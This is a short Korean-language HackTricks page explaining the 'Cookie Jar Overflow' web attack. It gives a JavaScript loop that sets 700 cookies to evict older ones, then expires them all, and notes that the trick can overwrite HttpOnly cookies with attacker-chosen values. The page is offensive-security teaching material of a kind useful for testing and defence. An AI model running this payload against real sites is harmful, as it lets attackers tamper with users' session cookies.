Cookie Jar Overflow - HackTricks

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

구독 계획 확인하기!
**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

브라우저는 페이지에 저장할 수 있는 쿠키의 수에 제한이 있습니다. 따라서 어떤 이유로 쿠키를 사라지게 해야 하는 경우, 쿠키 항아리를 오버플로우하여 가장 오래된 쿠키가 삭제되도록 할 수 있습니다:

javascript

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}

타사 쿠키가 다른 도메인을 가리키는 경우 덮어쓰이지 않음을 유의하세요.

caution

이 공격은 HttpOnly 쿠키를 덮어쓸 수 있습니다. 쿠키를 삭제한 다음 원하는 값으로 재설정할 수 있습니다.

이 실험실이 포함된 게시물에서 확인하세요.

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

구독 계획 확인하기!
**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.